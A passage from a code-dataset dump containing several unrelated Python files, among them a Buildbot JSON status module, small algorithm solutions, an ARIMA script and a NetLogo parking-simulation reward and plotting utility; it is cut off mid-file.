    ')\n\n if in_item:\n output.append('')\n while indent > 0:\n output.append('')\n indent -= 2\n return '\\n'.join(output)\n\n\nclass HelpResource(HtmlResource):\n def __init__(self, text, pageTitle, parent_node):\n HtmlResource.__init__(self)\n self.text = text\n self.pageTitle = pageTitle\n self.parent_level = parent_node.level\n self.parent_children = parent_node.children.keys()\n\n def content(self, request, cxt):\n cxt['level'] = self.parent_level\n cxt['text'] = ToHtml(self.text)\n cxt['children'] = [ n for n in self.parent_children if n != 'help' ]\n cxt['flags'] = ToHtml(FLAGS)\n cxt['examples'] = ToHtml(EXAMPLES).replace(\n 'href=\"/json',\n 'href=\"%sjson' % (self.level * '../'))\n\n template = request.site.buildbot_service.templates.get_template(\"jsonhelp.html\")\n return template.render(**cxt)\n\nclass BuilderPendingBuildsJsonResource(JsonResource):\n help = \"\"\"Describe pending builds for a builder.\n\"\"\"\n pageTitle = 'Builder'\n\n def __init__(self, status, builder_status):\n JsonResource.__init__(self, status)\n self.builder_status = builder_status\n\n def asDict(self, request):\n # buildbot.status.builder.BuilderStatus\n d = self.builder_status.getPendingBuildRequestStatuses()\n def to_dict(statuses):\n return defer.gatherResults(\n [ b.asDict_async() for b in statuses ])\n d.addCallback(to_dict)\n return d\n\n\nclass BuilderJsonResource(JsonResource):\n help = \"\"\"Describe a single builder.\n\"\"\"\n pageTitle = 'Builder'\n\n def __init__(self, status, builder_status):\n JsonResource.__init__(self, status)\n self.builder_status = builder_status\n self.putChild('builds', BuildsJsonResource(status, builder_status))\n self.putChild('slaves', BuilderSlavesJsonResources(status,\n builder_status))\n self.putChild(\n 'pendingBuilds',\n BuilderPendingBuildsJsonResource(status, builder_status))\n\n def asDict(self, request):\n # buildbot.status.builder.BuilderStatus\n return self.builder_status.asDict_async()\n\n\nclass BuildersJsonResource(JsonResource):\n help = \"\"\"List of all the builders defined on a master.\n\"\"\"\n pageTitle = 'Builders'\n\n def __init__(self, status):\n JsonResource.__init__(self, status)\n for builder_name in self.status.getBuilderNames():\n self.putChild(builder_name,\n BuilderJsonResource(status,\n status.getBuilder(builder_name)))\n\n\nclass BuilderSlavesJsonResources(JsonResource):\n help = \"\"\"Describe the slaves attached to a single builder.\n\"\"\"\n pageTitle = 'BuilderSlaves'\n\n def __init__(self, status, builder_status):\n JsonResource.__init__(self, status)\n self.builder_status = builder_status\n for slave_name in self.builder_status.slavenames:\n self.putChild(slave_name,\n SlaveJsonResource(status,\n self.status.getSlave(slave_name)))\n\n\nclass BuildJsonResource(JsonResource):\n help = \"\"\"Describe a single build.\n\"\"\"\n pageTitle = 'Build'\n\n def __init__(self, status, build_status):\n JsonResource.__init__(self, status)\n self.build_status = build_status\n self.putChild('source_stamp',\n SourceStampJsonResource(status,\n build_status.getSourceStamp()))\n self.putChild('steps', BuildStepsJsonResource(status, build_status))\n\n def asDict(self, request):\n return self.build_status.asDict()\n\n\nclass AllBuildsJsonResource(JsonResource):\n help = \"\"\"All the builds that were run on a builder.\n\"\"\"\n pageTitle = 'AllBuilds'\n\n def __init__(self, status, builder_status):\n JsonResource.__init__(self, status)\n self.builder_status = builder_status\n\n def getChild(self, path, request):\n # Dynamic childs.\n if isinstance(path, int) or _IS_INT.match(path):\n build_status = self.builder_status.getBuild(int(path))\n if build_status:\n # Don't cache BuildJsonResource; that would defeat the cache-ing\n # mechanism in place for BuildStatus objects (in BuilderStatus).\n return BuildJsonResource(self.status, build_status)\n return JsonResource.getChild(self, path, request)\n\n def asDict(self, request):\n results = {}\n # If max is too big, it'll trash the cache...\n max = int(RequestArg(request, 'max',\n self.builder_status.buildCacheSize/2))\n for i in range(0, max):\n child = self.getChildWithDefault(-i, request)\n if not isinstance(child, BuildJsonResource):\n continue\n results[child.build_status.getNumber()] = child.asDict(request)\n return results\n\n\nclass BuildsJsonResource(AllBuildsJsonResource):\n help = \"\"\"Builds that were run on a builder.\n\"\"\"\n pageTitle = 'Builds'\n\n def __init__(self, status, builder_status):\n AllBuildsJsonResource.__init__(self, status, builder_status)\n self.putChild('_all', AllBuildsJsonResource(status, builder_status))\n\n def getChild(self, path, request):\n # Transparently redirects to _all if path is not ''.\n return self.children['_all'].getChildWithDefault(path, request)\n\n def asDict(self, request):\n # This would load all the pickles and is way too heavy, especially that\n # it would trash the cache:\n # self.children['builds'].asDict(request)\n # TODO(maruel) This list should also need to be cached but how?\n builds = dict([\n (int(file), None)\n for file in os.listdir(self.builder_status.basedir)\n if _IS_INT.match(file)\n ])\n return builds\n\n\nclass BuildStepJsonResource(JsonResource):\n help = \"\"\"A single build step.\n\"\"\"\n pageTitle = 'BuildStep'\n\n def __init__(self, status, build_step_status):\n # buildbot.status.buildstep.BuildStepStatus\n JsonResource.__init__(self, status)\n self.build_step_status = build_step_status\n # TODO self.putChild('logs', LogsJsonResource())\n\n def asDict(self, request):\n return self.build_step_status.asDict()\n\n\nclass BuildStepsJsonResource(JsonResource):\n help = \"\"\"A list of build steps that occurred during a build.\n\"\"\"\n pageTitle = 'BuildSteps'\n\n def __init__(self, status, build_status):\n JsonResource.__init__(self, status)\n self.build_status = build_status\n # The build steps are constantly changing until the build is done so\n # keep a reference to build_status instead\n\n def getChild(self, path, request):\n # Dynamic childs.\n build_step_status = None\n if isinstance(path, int) or _IS_INT.match(path):\n build_step_status = self.build_status.getSteps()[int(path)]\n else:\n steps_dict = dict([(step.getName(), step)\n for step in self.build_status.getSteps()])\n build_step_status = steps_dict.get(path)\n if build_step_status:\n # Create it on-demand.\n child = BuildStepJsonResource(self.status, build_step_status)\n # Cache it.\n index = self.build_status.getSteps().index(build_step_status)\n self.putChild(str(index), child)\n self.putChild(build_step_status.getName(), child)\n return child\n return JsonResource.getChild(self, path, request)\n\n def asDict(self, request):\n # Only use the number and not the names!\n results = {}\n index = 0\n for step in self.build_status.getSteps():\n results[index] = step.asDict()\n index += 1\n return results\n\n\nclass ChangeJsonResource(JsonResource):\n help = \"\"\"Describe a single change that originates from a change source.\n\"\"\"\n pageTitle = 'Change'\n\n def __init__(self, status, change):\n # buildbot.changes.changes.Change\n JsonResource.__init__(self, status)\n self.change = change\n\n def asDict(self, request):\n return self.change.asDict()\n\n\nclass ChangesJsonResource(JsonResource):\n help = \"\"\"List of changes.\n\"\"\"\n pageTitle = 'Changes'\n\n def __init__(self, status, changes):\n JsonResource.__init__(self, status)\n for c in changes:\n # c.number can be None or clash another change if the change was\n # generated inside buildbot or if using multiple pollers.\n if c.number is not None and str(c.number) not in self.children:\n self.putChild(str(c.number), ChangeJsonResource(status, c))\n else:\n # Temporary hack since it creates information exposure.\n self.putChild(str(id(c)), ChangeJsonResource(status, c))\n\n def asDict(self, request):\n \"\"\"Don't throw an exception when there is no child.\"\"\"\n if not self.children:\n return {}\n return JsonResource.asDict(self, request)\n\n\nclass ChangeSourcesJsonResource(JsonResource):\n help = \"\"\"Describe a change source.\n\"\"\"\n pageTitle = 'ChangeSources'\n\n def asDict(self, request):\n result = {}\n n = 0\n for c in self.status.getChangeSources():\n # buildbot.changes.changes.ChangeMaster\n change = {}\n change['description'] = c.describe()\n result[n] = change\n n += 1\n return result\n\n\nclass ProjectJsonResource(JsonResource):\n help = \"\"\"Project-wide settings.\n\"\"\"\n pageTitle = 'Project'\n\n def asDict(self, request):\n return self.status.asDict()\n\n\nclass SlaveJsonResource(JsonResource):\n help = \"\"\"Describe a slave.\n\"\"\"\n pageTitle = 'Slave'\n\n def __init__(self, status, slave_status):\n JsonResource.__init__(self, status)\n self.slave_status = slave_status\n self.name = self.slave_status.getName()\n self.builders = None\n\n def getBuilders(self):\n if self.builders is None:\n # Figure out all the builders to which it's attached\n self.builders = []\n for builderName in self.status.getBuilderNames():\n if self.name in self.status.getBuilder(builderName).slavenames:\n self.builders.append(builderName)\n return self.builders\n\n def getSlaveBuildMap(self, buildcache, buildercache):\n for builderName in self.getBuilders():\n if builderName not in buildercache:\n buildercache.add(builderName)\n builder_status = self.status.getBuilder(builderName)\n\n buildnums = range(-1, -(builder_status.buildCacheSize - 1), -1)\n builds = builder_status.getBuilds(buildnums)\n\n for build_status in builds:\n if not build_status or not build_status.isFinished():\n # If not finished, it will appear in runningBuilds.\n break\n slave = buildcache[build_status.getSlavename()]\n slave.setdefault(builderName, []).append(\n build_status.getNumber())\n return buildcache[self.name]\n\n def asDict(self, request):\n if not hasattr(request, 'custom_data'):\n request.custom_data = {}\n if 'buildcache' not in request.custom_data:\n # buildcache is used to cache build information across multiple\n # invocations of SlaveJsonResource. It should be set to an empty\n # collections.defaultdict(dict).\n request.custom_data['buildcache'] = collections.defaultdict(dict)\n\n # Tracks which builders have been stored in the buildcache.\n request.custom_data['buildercache'] = set()\n\n results = self.slave_status.asDict()\n # Enhance it by adding more information.\n results['builders'] = self.getSlaveBuildMap(\n request.custom_data['buildcache'],\n request.custom_data['buildercache'])\n return results\n\n\nclass SlavesJsonResource(JsonResource):\n help = \"\"\"List the registered slaves.\n\"\"\"\n pageTitle = 'Slaves'\n\n def __init__(self, status):\n JsonResource.__init__(self, status)\n for slave_name in status.getSlaveNames():\n self.putChild(slave_name,\n SlaveJsonResource(status,\n status.getSlave(slave_name)))\n\n\nclass SourceStampJsonResource(JsonResource):\n help = \"\"\"Describe the sources for a SourceStamp.\n\"\"\"\n pageTitle = 'SourceStamp'\n\n def __init__(self, status, source_stamp):\n # buildbot.sourcestamp.SourceStamp\n JsonResource.__init__(self, status)\n self.source_stamp = source_stamp\n self.putChild('changes',\n ChangesJsonResource(status, source_stamp.changes))\n # TODO(maruel): Should redirect to the patch's url instead.\n #if source_stamp.patch:\n # self.putChild('patch', StaticHTML(source_stamp.path))\n\n def asDict(self, request):\n return self.source_stamp.asDict()\n\nclass MetricsJsonResource(JsonResource):\n help = \"\"\"Master metrics.\n\"\"\"\n title = \"Metrics\"\n\n def asDict(self, request):\n metrics = self.status.getMetrics()\n if metrics:\n return metrics.asDict()\n else:\n # Metrics are disabled\n return None\n\n\n\nclass JsonStatusResource(JsonResource):\n \"\"\"Retrieves all json data.\"\"\"\n help = \"\"\"JSON status\n\nRoot page to give a fair amount of information in the current buildbot master\nstatus. You may want to use a child instead to reduce the load on the server.\n\nFor help on any sub directory, use url /child/help\n\"\"\"\n pageTitle = 'Buildbot JSON'\n\n def __init__(self, status):\n JsonResource.__init__(self, status)\n self.level = 1\n self.putChild('builders', BuildersJsonResource(status))\n self.putChild('change_sources', ChangeSourcesJsonResource(status))\n self.putChild('project', ProjectJsonResource(status))\n self.putChild('slaves', SlavesJsonResource(status))\n self.putChild('metrics', MetricsJsonResource(status))\n # This needs to be called before the first HelpResource().body call.\n self.hackExamples()\n\n def content(self, request):\n result = JsonResource.content(self, request)\n # This is done to hook the downloaded filename.\n request.path = 'buildbot'\n return result\n\n def hackExamples(self):\n global EXAMPLES\n # Find the first builder with a previous build or select the last one.\n builder = None\n for b in self.status.getBuilderNames():\n builder = self.status.getBuilder(b)\n if builder.getBuild(-1):\n break\n if not builder:\n return\n EXAMPLES = EXAMPLES.replace('', builder.getName())\n build = builder.getBuild(-1)\n if build:\n EXAMPLES = EXAMPLES.replace('', str(build.getNumber()))\n if builder.slavenames:\n EXAMPLES = EXAMPLES.replace('', builder.slavenames[0])\n\n# vim: set ts=4 sts=4 sw=4 et:\n","repo_name":"houseoflifeproperty/bitpop","sub_path":"build/third_party/buildbot_8_4p1/buildbot/status/web/status_json.py","file_name":"status_json.py","file_ext":"py","file_size_in_byte":27016,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"29585326781","text":"import multiprocessing\nimport math\nimport logging\nimport datetime\nfrom multiprocessing.pool import Pool\n\nlogging.basicConfig(\n format=\"%(asctime)s - %(name)s - [%(filename)s:%(lineno)d] - %(levelname)s - %(message)s\",\n datefmt=\"%Y-%m-%d %I:%M:%S %p\",\n level=logging.INFO,\n)\nlogger = logging.getLogger(__name__)\n\n\ndef sqrt_even_numbers(limit: int):\n for n in range(1, limit + 1):\n if n % 2 == 0:\n # math.sqrt(n)\n # print(f\"number: {n}, square root: {math.sqrt(n)}\")\n logger.info(\"number: %s, square root: %s\", n, math.sqrt(n))\n\n\ndef main():\n # sqrt_even_numbers(10)\n print(\"Starting multiprocessing now...\")\n\n t0 = datetime.datetime.now()\n # create pool of processors to use\n pool = Pool(processes=multiprocessing.cpu_count())\n\n # send computation task to different processors in the pool\n pool.apply_async(func=sqrt_even_numbers, args=(100000,))\n pool.apply_async(func=sqrt_even_numbers, args=(200000,))\n pool.apply_async(func=sqrt_even_numbers, args=(300000,))\n pool.apply_async(func=sqrt_even_numbers, args=(400000,))\n\n # close the pool\n pool.close()\n\n # wait for the tasks to complete\n pool.join()\n\n dt = datetime.datetime.now() - t0\n\n print(f\"Total time taken in seconds: {dt.total_seconds():,.2f}\")\n\n\nif __name__ == \"__main__\":\n # sqrt_even_numbers()\n main()\n","repo_name":"andy-ifeanyi/concurrency_pattern_python","sub_path":"multiprocessing/basic_multiprocessing.py","file_name":"basic_multiprocessing.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8735012946","text":"#problem 34 / find first and last position of element in sorted array\nclass Solution(object):\n def searchRange(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n leftidx = self.binarysearch(nums,target,True)\n if leftidx == len(nums) or nums[leftidx] != target:\n return [-1,-1]\n return [leftidx,self.binarysearch(nums,target,False)-1]\n \n def binarysearch(self,nums,target,ifleft):\n lo = 0\n hi = len(nums)\n while lo < hi:\n mid = (lo+hi)/2\n if nums[mid] > target or (ifleft and target == nums[mid]):\n hi = mid\n else:\n lo = mid+1\n return lo","repo_name":"digitalladder/leetcode","sub_path":"problem34.py","file_name":"problem34.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32566416879","text":"import threading\nfrom multiprocessing.pool import ThreadPool\n\nfrom pyhtmlgui import Observable\n\nfrom app.devices.devices import DevicesInstance\nfrom app.files.shots import ShotsInstance\n\n\nclass Task_SyncShots(Observable):\n def __init__(self):\n super().__init__()\n self.name = \"Sync Shots\"\n self.status = \"idle\"\n self.worker = None\n\n def set_status(self, value):\n self.status = value\n self.notify_observers()\n\n def run(self):\n if self.worker is None:\n self.worker = threading.Thread(target=self._run, daemon=True)\n self.worker.start()\n\n def _run(self):\n if self.status != \"idle\":\n return\n self.set_status(\"list\")\n cameras = DevicesInstance().cameras.list()\n\n cameras = [c for c in cameras if c.status == \"online\"]\n with ThreadPool(20) as p:\n p.map(lambda device: device.camera.shots._refresh_list(), cameras)\n\n self.set_status(\"shots\")\n with ThreadPool(5) as p:\n p.map(lambda shot: shot._sync_remote(), ShotsInstance().shots)\n\n self.set_status(\"idle\")\n self.worker = None\n\n \n_taskSyncShotsInstance = None\n\n\ndef TaskSyncShotsInstance():\n global _taskSyncShotsInstance\n if _taskSyncShotsInstance is None:\n _taskSyncShotsInstance = Task_SyncShots()\n return _taskSyncShotsInstance\n","repo_name":"dirk-makerhafen/openpi3dscan","sub_path":"server/app/tasks/task_SyncShots.py","file_name":"task_SyncShots.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34435636101","text":"# uninhm\n# https://atcoder.jp/contests/abc089/tasks/abc089_c\n# combinatorics, semi-brute force\n\nfrom collections import Counter\n\nn = int(input())\ns = [input() for _ in range(n)]\n\nc = Counter()\n\nfor name in s:\n c[name[0]] += 1\n\nmarch = 'MARCH'\n\nans = 0\nfor i in range(len(march)):\n for j in range(i+1, len(march)):\n for k in range(j+1, len(march)):\n ans += c[march[i]] * c[march[j]] * c[march[k]]\n\nprint(ans)\n","repo_name":"Vicfred/kyopro","sub_path":"atcoder/abc089C_march.py","file_name":"abc089C_march.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"72"} +{"seq_id":"3716121238","text":"'''\r\n\tArima model\r\n\thttps://machinelearningmastery.com/arima-for-time-series-forecasting-with-python/\r\n'''\r\nfrom pandas import read_csv\r\nfrom pandas import datetime\r\nfrom pandas import DataFrame\r\nfrom statsmodels.tsa.arima_model import ARIMA\r\nfrom matplotlib import pyplot\r\nimport numpy as np \r\n\r\ndef parser(x):\r\n#\treturn datetime.strptime(str(x), '%Y%m.0')\r\n\treturn datetime.strptime(str(x), '%m')\r\n\r\nseries = read_csv(\r\n#\t'/home/evanb/output/data-randomforest2.txt', \r\n\t'/home/evanb/datasets/onedist.csv',\r\n\theader=0, \r\n\tparse_dates=[11], \r\n\t#index_col=0, \r\n\tsqueeze=True, \r\n\tdate_parser=parser,\r\n\tlow_memory=False\r\n)\r\nprint(series)\r\n# fit model\r\nmodel = ARIMA(np.asarray(series), order=(3,1,0))\r\nmodel_fit = model.fit(disp=0)\r\nprint(model_fit.summary())\r\n# plot residual errors\r\nresiduals = DataFrame(model_fit.resid)\r\nresiduals.plot()\r\npyplot.show()\r\nresiduals.plot(kind='kde')\r\npyplot.show()\r\nprint(residuals.describe())\r\n\r\n","repo_name":"ebradham/mlcode","sub_path":"arima.py","file_name":"arima.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26334362070","text":"import sys\n\ndef isPrime(number): \n counter = 0\n for i in range(number + 1):\n if i == 0:\n continue\n if number % i == 0:\n counter += 1\n \n if counter == 2:\n print(True)\n else: \n print(False)\n\nif __name__ == \"__main__\":\n isPrime(int(sys.argv[1]))\n","repo_name":"tam2628/linear_regression","sub_path":"checkprime.py","file_name":"checkprime.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1997020156","text":"from setuptools import setup, find_packages\nfrom MineRL.globals import VERSION\n\n\nextras = {}\ntest_deps = ['pytest']\n\nall_deps = []\nfor group_name in extras:\n all_deps += extras[group_name]\nall_deps = all_deps + test_deps\nextras['all'] = all_deps\n\n\nsetup(\n name='MineRL',\n version=VERSION,\n author='heron',\n author_email='wyatt.lansford@heronsystems.com',\n description='Minecraft Offline Learning Env',\n long_description='',\n long_description_content_type=\"text/markdown\",\n url='https://github.com/wyattlansford/MineRL',\n license='Closed',\n python_requires='>=3.6.0',\n packages=find_packages(),\n install_requires=[\n ],\n test_requires=test_deps,\n extras_require=extras,\n include_package_data=True\n)","repo_name":"wyattlansford/MineRL","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12668710329","text":"import csv\nimport json\nimport os\nimport re\nfrom glob import glob\nfrom pathlib import Path\nfrom typing import List, Dict\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom cmcrameri import cm\nfrom zipfile import BadZipFile\n\nsns.set_style(\"dark\")\nsns.set_context(\"paper\")\n\nX_LABEL = [\n f\"{int(x)}:00 AM\" if x < 12 else f\"{int(x - [12 if x != 12 else 0])}:00 PM\"\n for x in np.arange(8, 22, 2)\n]\n\n\ndef add_bool_arg(parser, name, default=False):\n \"\"\"\n Adds boolean arguments to parser by registering both the positive argument and the \"no\"-argument.\n :param parser:\n :param name: Name of argument.\n :param default:\n :return:\n \"\"\"\n group = parser.add_mutually_exclusive_group(required=False)\n group.add_argument(\"--\" + name, dest=name, action=\"store_true\")\n group.add_argument(\"--no-\" + name, dest=name, action=\"store_false\")\n parser.set_defaults(**{name: default})\n\n\ndef occupancy_reward_function(\n colours: List[str], current_state: Dict[str, float], global_mode=False\n):\n \"\"\"\n Rewards occupancy rates between 75% and 90%. Punishes deviations exponentially.\n :param current_state: State dictionary.\n :param colours: Colours of different CPZs.\n :param global_mode: Whether or not to use the global occupancies or the one of the individual CPZs.\n :return: reward\n \"\"\"\n reward = 0\n if global_mode:\n cpz_occupancies = [current_state[\"overall_occupancy\"]]\n else:\n cpz_occupancies = [current_state[f\"{c}-lot occupancy\"] for c in colours]\n\n for val in cpz_occupancies:\n if 0.75 < val < 0.9:\n reward += 1\n elif val <= 0.75:\n value = 1 - (abs(val - 0.825) / 0.825) ** -1.2\n min_value = 1 - (abs(0 - 0.825) / 0.825) ** -1.2\n max_value = 1 - (abs(0.75 - 0.825) / 0.825) ** -1.2\n max_distance = max_value - min_value\n actual_distance = value - min_value\n reward += actual_distance / max_distance\n elif val >= 0.9:\n value = 1 - (abs(val - 0.825) / 0.825) ** -1.2\n min_value = 1 - (abs(1 - 0.825) / 0.825) ** -1.2\n max_value = 1 - (abs(0.9 - 0.825) / 0.825) ** -1.2\n max_distance = max_value - min_value\n actual_distance = value - min_value\n reward += actual_distance / max_distance\n return reward / len(cpz_occupancies)\n\n\ndef n_cars_reward_function(colours: List[str], current_state: Dict[str, float]):\n \"\"\"\n Minimizes the number of cars in the simulation.\n :param colours: Colours of different CPZs (only present to be able to use one call in custom_environment.py).\n :param current_state:State dictionary.\n :return: reward\n \"\"\"\n return optimize_attr(current_state, \"n_cars\", mode=\"min\")\n\n\ndef social_reward_function(colours: List[str], current_state: Dict[str, float]):\n \"\"\"\n Maximizes the normalized share of poor cars in the model.\n :param colours: Colours of different CPZs (only present to be able to use one call in custom_environment.py).\n :param current_state:State dictionary.\n :return: reward\n \"\"\"\n return optimize_attr(current_state, \"normalized_share_low\")\n\n\ndef speed_reward_function(colours: List[str], current_state: Dict[str, float]):\n \"\"\"\n Maximizes the average speed of the turtles in the model.\n :param colours: Colours of different CPZs (only present to be able to use one call in custom_environment.py).\n :param current_state:State dictionary.\n :return: reward\n \"\"\"\n return optimize_attr(current_state, \"mean_speed\")\n\n\ndef composite_reward_function(colours: List[str], current_state: Dict[str, float]):\n \"\"\"\n Maximizes 1/2 occupancy_reward_function + 1/4 n_cars_reward_function + 1/4 social_reward_function\n :param colours: Colours of different CPZs (only present to be able to use one call in custom_environment.py).\n :param current_state:State dictionary.\n :return: reward\n \"\"\"\n return (\n 0.5 * occupancy_reward_function(colours, current_state, global_mode=True)\n + 0.25 * n_cars_reward_function(colours, current_state)\n + 0.25 * social_reward_function(colours, current_state)\n )\n\n\ndef optimize_attr(current_state: Dict[str, float], attr: str, mode=\"max\"):\n \"\"\"\n Abstract function to optimize attributes.\n :param mode: either \"min\" or \"max\" (default).\n :param current_state: State dictionary.\n :param attr: Attribute in state dictionary to optimize.\n :return: reward-value\n \"\"\"\n if mode == \"min\":\n return abs(current_state[attr] - 1) ** 2\n else:\n return current_state[attr] ** 2\n\n\ndef document_episode(nl, path: Path, reward_sum):\n \"\"\"\n Create directory for current episode and command NetLogo to save model as csv.\n :param nl: NetLogo-Session of environment.\n :param path: Path of current episode.\n :param reward_sum: Sum of accumulated rewards for episode.\n :return:\n \"\"\"\n path.mkdir(parents=True, exist_ok=True)\n # Get all directories to check which episode this is\n dirs = glob(str(path) + \"/E*.pkl\")\n current_episode = 1\n if dirs:\n last_episode = max(\n [int(re.findall(\"E(\\d+)\", dirs[i])[0]) for i in range(len(dirs))]\n )\n current_episode = last_episode + 1\n episode_path = str(path / f\"E{current_episode}_{np.around(reward_sum, 8)}\").replace(\n \"\\\\\", \"/\"\n )\n\n nl.command(f'export-world \"{episode_path}.csv\"')\n nl.command(f'export-view \"{episode_path}.png\"')\n\n # Save relevant data as pickle to save storage\n df = get_data_from_run(f\"{episode_path}.csv\")\n df.to_pickle(f\"{episode_path}.pkl\", compression=\"zip\")\n\n # Delete csv\n os.remove(f\"{episode_path}.csv\")\n\n\ndef label_episodes(path: Path, df: pd.DataFrame, mode: str):\n \"\"\"\n Identifies worst, median and best episode of run. Renames them and saves plots.\n :param path: Path of current Experiment.\n :param df: DataFrame containing the results.\n :param mode: Usually either \"training\" or \"evaluation\".\n :return:\n \"\"\"\n episode_files = glob(str(path) + \"/E*.pkl\")\n performances = dict()\n performances[\"max\"] = np.around(df.rewards.max(), 8)\n performances[\"min\"] = np.around(df.rewards.min(), 8)\n performances[\"median\"] = np.around(\n df.rewards.sort_values(ignore_index=True)[np.ceil(len(df) / 2) - 1], 8\n )\n\n print(f\"Performances for {mode}:\")\n print(performances)\n\n for metric in performances.keys():\n if performances[metric] == 0.0:\n performances[metric] = 0\n found = False\n for episode in episode_files:\n # Baseline\n if mode not in [\"training\", \"eval\"]:\n if str(performances[metric]) == episode.split(\"_\")[-1].split(\".pkl\")[0]:\n found = True\n elif str(performances[metric]) in episode:\n found = True\n if found:\n new_path = path / mode / metric\n new_path.mkdir(parents=True, exist_ok=True)\n save_plots(new_path, episode)\n os.rename(\n episode,\n str(new_path / f\"{mode}_{metric}_{performances[metric]}.pkl\"),\n )\n os.rename(\n episode.replace(\"pkl\", \"png\"),\n str(new_path / f\"view_{mode}_{metric}_{performances[metric]}.png\"),\n )\n episode_files.remove(episode)\n break\n\n\ndef delete_unused_episodes(path: Path):\n \"\"\"\n Deletes episodes that did not produce either min, median or max performances to save storage.\n :param path: Path of current Experiment\n :return:\n \"\"\"\n # Get all episodes not moved due to being min, median or max\n episode_files = glob(str(path) + \"/E*\")\n\n # Remove files of episodes\n for file in episode_files:\n if os.path.isfile(file) and \"eval\" not in file:\n os.remove(file)\n\n print(\"Unused Files deleted!\")\n\n\ndef save_plots(outpath: Path, episode_path: str):\n \"\"\"\n Calls all plot functions for given episode.\n :param outpath: Path to save plots.\n :param episode_path: Path of current episode.\n :return:\n \"\"\"\n try:\n data_df = pd.read_pickle(episode_path, compression=\"zip\")\n except FileNotFoundError:\n data_df = get_data_from_run(episode_path)\n\n for func in [\n plot_fees,\n plot_occup,\n plot_social,\n plot_n_cars,\n plot_speed,\n plot_income_stats,\n plot_share_yellow,\n plot_share_parked,\n plot_share_vanished,\n ]:\n func(data_df, outpath)\n\n\ndef get_data_from_run(episode_path):\n \"\"\"\n Extracts data for plots from episode.csv saved by NetLogo.\n :param episode_path: Path of current episode.\n :return: DataFrame with data of current episode.\n \"\"\"\n # Open JSON file containing the indexing information required to extract the information needed for plotting\n with open(\"df_index.json\", \"r\") as fp:\n INDEX_DICT = json.load(fp=fp)\n\n with open(episode_path, newline=\"\") as csvfile:\n file_reader = csv.reader(csvfile, delimiter=\",\", quotechar='\"')\n for i, row in enumerate(file_reader):\n for key in INDEX_DICT.keys():\n if INDEX_DICT[key][\"title\"] in row:\n INDEX_DICT[key][\"i\"] = i\n\n data_df = pd.read_csv(\n episode_path, skiprows=INDEX_DICT[\"fee\"][\"i\"] + 11, nrows=21601\n )\n data_df = data_df.rename(\n columns={\n \"y\": \"yellow_lot_fee\",\n \"y.1\": \"teal_lot_fee\",\n \"y.2\": \"green_lot_fee\",\n \"y.3\": \"blue_lot_fee\",\n }\n )\n data_df = data_df[\n [\"x\", \"yellow_lot_fee\", \"green_lot_fee\", \"teal_lot_fee\", \"blue_lot_fee\"]\n ]\n data_df.x = data_df.x / 1800\n del INDEX_DICT[\"fee\"]\n\n i = 0\n # Catch exceptions for different versions of NetLogo model run\n while i < len(INDEX_DICT.keys()):\n key = sorted(INDEX_DICT)[i]\n try:\n temp_df = pd.read_csv(\n episode_path,\n skiprows=INDEX_DICT[key][\"i\"] + INDEX_DICT[key][\"offset\"],\n nrows=21601,\n )\n for j, col in enumerate(INDEX_DICT[key][\"cols\"]):\n temp_df = temp_df.rename(columns={f\"y.{j}\" if j > 0 else \"y\": col})\n temp_df = temp_df[INDEX_DICT[key][\"cols\"]]\n data_df = data_df.join(temp_df)\n i += 1\n except KeyError:\n INDEX_DICT[key][\"offset\"] += 1\n\n return data_df\n\n\ndef plot_fees(data_df, outpath):\n \"\"\"\n Plot fees for CPZs over run of episode.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n color_list = [\n cm.imola_r(0),\n cm.imola_r(1.0 * 1 / 3),\n cm.imola_r(1.0 * 2 / 3),\n cm.imola_r(1.0),\n ]\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n ax.plot(\n data_df.x,\n data_df.yellow_lot_fee,\n linewidth=4,\n color=color_list[0],\n linestyle=\"solid\",\n )\n ax.plot(\n data_df.x,\n data_df.green_lot_fee,\n linewidth=4,\n color=color_list[1],\n linestyle=\"dashed\",\n )\n ax.plot(\n data_df.x,\n data_df.teal_lot_fee,\n linewidth=4,\n color=color_list[2],\n linestyle=\"dashed\",\n )\n ax.plot(\n data_df.x,\n data_df.blue_lot_fee,\n linewidth=4,\n color=color_list[3],\n linestyle=\"dashed\",\n )\n\n ax.set_ylim(bottom=0, top=10.1)\n\n ax.set_ylabel(\"Hourly Fee in €\", fontsize=30)\n ax.set_xlabel(\"\", fontsize=30)\n ax.grid(True)\n ax.tick_params(axis=\"both\", labelsize=25)\n ax.set_xlabel(\"Time of Day\", fontsize=30)\n ax.set_xticks(ticks=np.arange(0, max(data_df[\"x\"]) + 1, 2))\n ax.set_xticklabels(labels=X_LABEL)\n\n create_colourbar(fig)\n fig.savefig(str(outpath / \"fees.pdf\"), bbox_inches=\"tight\")\n plt.close(fig)\n\n\ndef plot_occup(data_df, outpath):\n \"\"\"\n Plot occupation levels of different CPZs over run of episode.\n :param data_df: DataFrame with data from current episode.\n :param outpath: Path to save plot.\n :return:\n \"\"\"\n # Save plot with three variants of legend location\n for loc in [\"lower right\", \"right\", \"upper right\"]:\n fig, ax = plt.subplots(1, 1, figsize=(20, 8), dpi=300)\n\n color_list = [\n cm.imola_r(0),\n cm.imola_r(1.0 * 1 / 